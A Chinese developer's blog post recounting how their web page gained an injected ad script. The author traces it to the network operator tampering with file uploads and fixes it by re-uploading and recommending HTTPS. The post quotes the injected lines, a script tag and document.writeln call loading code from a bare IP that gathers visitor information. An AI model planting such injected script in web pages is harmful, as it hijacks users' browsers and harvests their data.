HTML被恶意注入JS弹广告

自己写个的网页上传到阿里云服务器供APP访问,突然发现在手机访问该页面时间歇性的弹出广告。你说膈应人不?😭

然后再用浏览器访问,查看源码发现在<head> 中多了一行这个东西

http://45.126.123.80:118/j.js?MAC=8CAB8EBA6EB8

点击进去

 document.writeln("<script src=\'http://45.126.123.80:118/t.php\'>
</script>");

继续查看http://45.126.123.80:118/t.php 一堆代码,获取各种信息。。。

瞬间心里很不爽,自己的页面就这样被人插了。

开始怀疑

  • 买的阿里云服务器被黑了
  • 文件上传软件有漏洞被人恶意篡改了

一番尝试之后

以上两点都不是,是由于上传文件时被运营商拦截了,然后注入上面js代码。

1、我换用手机4G网络连接,新建HTML文件上传,浏览,查看源码,一切正常。

2、我换用同事360WiFi热点后,重复1操作,一切正常。

3、我再次连接公司网络,重复1操作,还是出现恶心的js注入。

所以,我不得不把我的所有html页面重新上传覆盖了一遍。。。问题貌似解决了。

总结

网络运营商搞得鬼,拦截你的请求、插入你的代码、然后给你弹出广告、然后自己获利赚钱,整个一套不要脸的流程。

解决途径:

  • 像我一样替换网络重新上传覆盖原有被插的文件
  • 打电话给运营商,骂他,骂到不在插你为止
  • 使用https

以此记录,大家也要留意了。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 174,634评论 25 709
  • 用两张图告诉你,为什么你的 App 会卡顿? - Android - 掘金 Cover 有什么料? 从这篇文章中你...
    hw1212阅读 13,128评论 2 59
  • 昨天,有小伙伴在幸福双翼学习群里发帖诉说一件"好心不得好报"的事:小伙伴的朋友求助问题,她用自己的见解去帮朋友,却...
    静待花开Julia阅读 279评论 1 0
  • 一、觉察日记 【事实】一位非常好的好友也是长辈,在即将退休的年龄坚持做自己喜欢的事情,再次约见并一起认识了另外一个...
    以诗为名阅读 228评论 0 0
  • 丹丹,你好吗?今天感觉如何? 放空后,觉得一切都挺好的,值得珍惜,很美好,感动感恩每一个发生,每一...
    杨丹_cbc4阅读 170评论 0 0